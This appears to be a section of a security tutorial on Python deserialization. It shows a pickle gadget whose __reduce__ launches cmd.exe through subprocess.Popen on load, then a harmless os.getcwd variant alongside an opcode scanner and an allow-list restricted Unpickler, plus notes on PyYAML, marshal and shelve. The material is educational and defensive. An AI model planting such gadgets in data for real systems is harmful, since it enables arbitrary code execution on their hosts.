5.2.2. Deserialization
5.2.2.1. pickle demo
Python's pickle calls an object's ``__reduce__`` method when it serializes the object, and the result (a callable plus its arguments) is stored in the pickle stream; when the stream is loaded, pickle imports that callable and calls it to rebuild the object. A class with a custom ``__reduce__`` can therefore name any importable callable, such as ``subprocess.Popen``, and it will be executed on ``pickle.loads()`` by whoever deserializes the data.
import pickle
import pickletools
import subprocess

class A(object):
    a = 1
    b = 2

    def __reduce__(self):
        # Serialized as "call subprocess.Popen(('cmd.exe',))"; the process is
        # spawned when the pickle is loaded, not when it is dumped.
        return (subprocess.Popen, (('cmd.exe',),))

data = pickle.dumps(A())
# Disassemble the stream: the GLOBAL/STACK_GLOBAL opcode imports
# subprocess.Popen and REDUCE calls it. Nothing runs until pickle.loads(data).
pickletools.dis(data)
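The demo above only disassembles the payload. The following added example (not part of the original page) carries it through: it builds a gadget the same way, loads it unsafely to show the callable actually runs, scans the opcodes with ``pickletools.genops`` to flag a stream that imports or calls a global before anything is loaded, and wraps ``pickle.Unpickler`` in a restricted loader whose ``find_class`` allow-list refuses the gadget. ``os.getcwd`` is used as a harmless stand-in for ``cmd.exe``; the allow-list contents and the function names (``make_payload``, ``dangerous_opcodes``, ``restricted_loads``, ``demo``) are choices for this demo. The ``find_class`` override is the "Restricting Globals" pattern from the pickle module documentation.

```python
"""Added example: a pickle gadget, an opcode scan, and a restricted Unpickler.
Not code from the original page. os.getcwd stands in for a shell command so
the demo is harmless; the allow-list below is just what this demo needs."""
import io
import os
import pickle
import pickletools


class Gadget:
    """__reduce__ makes pickle store "call os.getcwd()" instead of a state
    dict, so pickle.loads() executes that call while reconstructing us."""

    def __reduce__(self):
        return (os.getcwd, ())


def make_payload() -> bytes:
    """Constructed malicious pickle (stand-in for an attacker-supplied one)."""
    return pickle.dumps(Gadget())


def safe_sample() -> bytes:
    """Constructed benign pickle of plain data, for comparison."""
    return pickle.dumps({"a": [1, 2, 3], "b": "x"})


def dangerous_opcodes(data: bytes) -> list:
    """Names of opcodes that import a global or call a callable.

    GLOBAL / STACK_GLOBAL import module.attribute; REDUCE, INST, OBJ, NEWOBJ
    and NEWOBJ_EX call something. A pickle of ints, strings, lists and dicts
    contains none of them, so a non-empty result is worth refusing up front.
    """
    risky = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}
    return [op.name for op, _arg, _pos in pickletools.genops(data) if op.name in risky]


def unsafe_loads(data: bytes):
    """What the victim does: plain pickle.loads runs whatever was reduced."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Only the listed (module, name) pairs may be imported; everything else,
    including os.getcwd and subprocess.Popen, raises UnpicklingError."""

    ALLOWED = {
        ("builtins", "set"),
        ("builtins", "frozenset"),
        ("collections", "OrderedDict"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    """Returns (result of unsafe load, whether the restricted loader blocked it)."""
    payload = make_payload()
    pickletools.dis(payload)          # shows the GLOBAL/REDUCE sequence
    executed = unsafe_loads(payload)  # os.getcwd() ran; returns the cwd string
    try:
        restricted_loads(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return executed, blocked


if __name__ == "__main__":
    result, blocked = demo()
    print("unsafe load executed the gadget, returned:", result)
    print("restricted loader blocked it:", blocked)
    print("dangerous opcodes in payload:", dangerous_opcodes(make_payload()))
    print("dangerous opcodes in plain data:", dangerous_opcodes(safe_sample()))
```

The opcode scan is a cheap pre-filter, not a substitute for the allow-list: the only reliable defence is never to unpickle untrusted bytes, and when a pickle must be accepted, to resolve globals through an explicit allow-list as ``RestrictedUnpickler`` does.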
5.2.2.2. Other serialization libraries
The same "deserialization calls a callable" problem exists outside pickle:
PyYAML: yaml.load() with the full Loader resolves tags such as !!python/object/apply: and calls the named callable with the given arguments; use yaml.safe_load() (or SafeLoader) for untrusted input.
marshal: the module documentation states it is not secure against erroneous or maliciously constructed data; it can also deserialize code objects, which run as soon as they are passed to exec().
shelve: built on pickle, so reading a key from an attacker-supplied shelf file unpickles attacker-controlled data with the same consequences as pickle.loads().